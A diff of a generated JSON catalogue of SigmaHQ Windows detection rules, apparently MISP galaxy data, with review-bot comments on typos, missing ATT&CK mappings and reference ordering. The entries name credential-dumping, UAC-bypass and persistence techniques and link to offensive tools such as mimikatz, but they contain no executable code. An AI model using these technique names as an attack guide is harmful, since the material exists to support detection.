@@ -10514,9 +13258,154 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", "value": "Potential Active Directory Reconnaissance/Enumeration Via LDAP" }, + { + "description": "Detects an appx package installation with the error code \"0x80073cff\". Whihc indicates that the package didn't meet the sgining requirements and could be suspicious", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Legitimate AppX packages not signed by MS used part of an enterprise" + ], + "filename": "appxdeployment_server_susp_appx_package_installation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_appx_package_installation.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "898d5fc9-fbc3-43de-93ad-38e97237c344", + "value": "Suspicious AppX Package Installation Attempt" + }, + { + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": 
"appxdeployment_server_susp_package_locations.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_package_locations.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "value": "Suspicious AppX Package Locations" + }, + { + "description": "Detects installation of known malicious appx packages", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" + ], + "filename": "appxdeployment_server_mal_appx_names.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_mal_appx_names.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", + "value": "Malicious AppX Package Installed" + }, + { + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "meta": { + "author": "Nasreddine 
Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "appxdeployment_server_susp_domains.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_domains.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "8b48ad89-10d8-4382-a546-50588c410f0d", + "value": "Suspicious Remote AppX Package Locations" + }, + { + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "appxdeployment_server_uncommon_package_locations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_uncommon_package_locations.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c977cb50-3dff-4a9f-b873-9290f56132f1", + "value": "Uncommon AppX Package Locations" + }, { "description": "Detects removal of an exported Exchange mailbox which could be to 
cover tracks from ProxyShell exploit", "meta": { @@ -10562,6 +13451,15 @@ "attack.t1210" ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "value": "Possible Exploitation of Exchange RCE CVE-2021-42321" }, @@ -10610,6 +13508,15 @@ "attack.t1505.002" ] }, + "related": [ + { + "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "value": "Failed MSExchange Transport Agent Installation" }, @@ -10634,6 +13541,15 @@ "attack.resource_development" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", "value": "ProxyLogon MSExchange OabVirtualDirectory" }, @@ -10706,6 +13622,15 @@ "attack.t1505.002" ] }, + "related": [ + { + "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", "value": "MSExchange Transport Agent Installation - Builtin" }, @@ -10722,8 +13647,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" ], "tags": [ 
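Review bot: The five new AppX entries in the `@@ -10514,9 +13258,154 @@` hunk carry description typos inherited from the upstream rule text — `Whihc` and `sgining` in "Suspicious AppX Package Installation Attempt", `legtimate` in the falsepositive of "Malicious AppX Package Installed", and `added the pipeline` (for "added to the pipeline") in three descriptions — and because this file looks generated, the correction belongs in the SigmaHQ rule files or the next regeneration will reintroduce them. The `refs` arrays of four of these entries also mix URLs with the free-text string `"Internal Research"`, so a consumer that renders `refs` as links gets a broken item; the generator could skip non-URL references or move them to a separate field. These are the only entries in the hunk without a `related` block, which is consistent with them being tagged only with the tactic `attack.defense_evasion` and no technique id if the `related` mapping keys off technique tags; it is worth confirming that is intended rather than a missed mapping.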
@@ -10731,6 +13656,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "value": "Exports Registry Key To an Alternate Data Stream" }, @@ -10747,8 +13681,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml" ], "tags": [ @@ -10757,6 +13691,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", "value": "Suspicious File Download from File Sharing Domain" }, @@ -10773,8 +13716,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml" ], "tags": [ @@ -10783,6 +13726,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", "value": "Unusual File Download from File Sharing Domain" }, 
@@ -10831,6 +13783,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", "value": "Unusual File Download from Direct IP Address" }, @@ -10856,6 +13817,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", "value": "Hacktool Download" }, @@ -10881,6 +13851,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "value": "Executable in ADS" }, @@ -10897,7 +13876,7 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1137/002/", + "https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" ], "tags": [ @@ -10905,6 +13884,15 @@ "attack.t1137.002" ] }, + "related": [ + { + "dest-uuid": "ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", "value": "Office Application Startup - Office Test" }, 
@@ -10971,9 +13959,9 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://www.dfirnotes.net/portproxy_detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" ], "tags": [ @@ -10983,6 +13971,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", "value": "PortProxy Registry Key" }, @@ -11000,8 +13997,8 @@ "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", - "https://persistence-info.github.io/Data/recyclebin.html", "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", + "https://persistence-info.github.io/Data/recyclebin.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" ], "tags": [ @@ -11025,8 +14022,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blog.xpnsec.com/exploring-mimikatz-part-1/", "https://twitter.com/SBousseaden/status/1183745981189427200", + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" ], "tags": [ 
@@ -11035,6 +14032,15 @@ "attack.t1547.008" ] }, + "related": [ + { + "dest-uuid": "f0589bc3-a6ae-425a-a3d5-5659bfee07f4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", "value": "DLL Load via LSASS" }, @@ -11061,6 +14067,15 @@ "attack.t1546.002" ] }, + "related": [ + { + "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", "value": "Path To Screensaver Binary Modified" }, @@ -11077,9 +14092,9 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", + "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" ], "tags": [ @@ -11089,6 +14104,15 @@ "cve.2021.34527" ] }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "value": "PrinterNightmare Mimimkatz Driver Name" }, 
@@ -11154,8 +14178,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", + "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" ], "tags": [ @@ -11163,6 +14187,15 @@ "attack.t1546.009" ] }, + "related": [ + { + "dest-uuid": "7d57b371-10c2-45e5-b3cc-83a8fb380e4c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", "value": "New DLL Added to AppCertDlls Registry Key" }, @@ -11212,6 +14245,15 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "value": "Creation of a Local Hidden User Account by Registry" }, @@ -11237,6 +14279,15 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", "value": "Windows Credential Editor Registry" }, @@ -11261,6 +14312,15 @@ "attack.t1547.005" ] }, + "related": [ + { + "dest-uuid": "5095a853-299c-4876-abd7-ac0050fb5462", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", "value": "Security Support Provider (SSP) Added to LSA Configuration" }, 
@@ -11299,8 +14359,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" ], "tags": [ @@ -11334,6 +14394,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", "value": "UAC Bypass Via Wsreset" }, @@ -11375,8 +14444,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" ], "tags": [ @@ -11411,6 +14480,15 @@ "attack.t1546.010" ] }, + "related": [ + { + "dest-uuid": "cc89ecbd-3d33-4a41-bcca-001e702d18fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", "value": "New DLL Added to AppInit_DLLs Registry Key" }, 
@@ -11486,6 +14564,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", "value": "CMSTP Execution Registry Event" }, @@ -11502,8 +14589,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", + "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" ], "tags": [ @@ -11527,8 +14614,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" ], "tags": [ @@ -11538,6 +14625,15 @@ "attack.t1547" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "value": "Atbroker Registry Change" }, @@ -11610,6 +14706,15 @@ "attack.t1608" ] }, + "related": [ + { + "dest-uuid": "84771bc3-f6a0-403e-b144-01af70e5fda0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "value": "HybridConnectionManager Service Installation - Registry" }, 
@@ -11634,6 +14739,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", "value": "Esentutl Volume Shadow Copy Service Keys" }, @@ -11650,10 +14764,10 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", - "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://github.com/hfiref0x/UACME", "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", + "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" ], "tags": [ @@ -11663,6 +14777,15 @@ "attack.t1546.001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "value": "Shell Open Registry Keys Manipulation" }, @@ -11712,6 +14835,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", "value": "Potential Credential Dumping Via LSASS SilentProcessExit Technique" }, 
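Review bot: The new `related` block for `Shell Open Registry Keys Manipulation` carries a single link to `120d5519-3098-4e1c-9191-2aa61232f073`, the same dest-uuid this patch attaches to entries tagged `attack.t1548.002` (`UAC Bypass Via Wsreset`, `Disable UAC Using Registry`), while the hunk's visible tag `attack.t1546.001` receives no relation at all. Other entries in the same patch (`Chafer Activity - Registry`) do get one relation per technique tag, so the generator is evidently able to emit several; this looks like a dropped mapping rather than a deliberate choice. I would have the generator emit a second `related` item for `attack.t1546.001` and, more generally, log or fail when an `attack.tNNNN` or `attack.tNNNN.NNN` tag resolves to no dest-uuid, so missing ATT&CK pivots are caught instead of silently omitted. The same check would surface the `attack.s0005` tag on `Windows Credential Editor Registry`, which in this patch appears to resolve only to the technique uuid `65f2d882-3f41-4d48-8a06-29af77ec9f90` that the LSASS SilentProcessExit entry also uses.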
@@ -11736,6 +14868,15 @@ "attack.t1491.001" ] }, + "related": [ + { + "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8b9606c9-28be-4a38-b146-0e313cc232c1", "value": "Potential Ransomware Activity Using LegalNotice Message" }, @@ -11767,6 +14908,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", "value": "Chafer Activity - Registry" }, @@ -11792,6 +14949,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", "value": "Pandemic Registry Key" }, @@ -11816,6 +14982,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "value": "Removal Of Index Value to Hide Schedule Task" }, @@ -11866,6 +15041,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", "value": "Removal Of SD Value to Hide Schedule Task" }, 
@@ -11931,11 +15115,11 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", - "https://github.com/OTRF/detection-hackathon-apt29/issues/7", - "https://docs.microsoft.com/en-us/windows/win32/shell/launch", "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", + "https://docs.microsoft.com/en-us/windows/win32/shell/launch", + "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://github.com/OTRF/detection-hackathon-apt29/issues/7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" ], "tags": [ @@ -11967,6 +15151,15 @@ "attack.t1546.015" ] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", "value": "Windows Registry Persistence COM Key Linking" }, @@ -11983,8 +15176,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" ], "tags": [ 
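Review bot: This hunk changes nothing but the order of the five `refs` entries for `registry_delete_removal_com_hijacking_registry_key.yml`, and the same reshuffling recurs in most hunks of this patch (the `regedit` export-to-ADS, `stickykey`, `shell_open_keys` and `terminal_server_suspicious` entries among them). That pattern suggests the generator accumulates references in an unordered container, so every regeneration yields diff noise that buries the substantive changes — the new `related` links and the added or removed rules — that a reviewer actually needs to audit. Preserve the upstream rule's reference order, or sort deterministically before appending the SigmaHQ permalink, e.g. in Python `refs = list(dict.fromkeys(rule_refs)) + [sigma_url]`, and regenerate once so later updates only show real changes.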
@@ -12017,6 +15210,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", "value": "Sysinternals SDelete Registry Keys" }, @@ -12041,6 +15243,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "value": "Usage of Suspicious Sysinternals Tools" }, @@ -12057,8 +15268,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml" ], "tags": [ @@ -12089,6 +15300,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", "value": "Usage of Renamed Sysinternals Tools" }, 
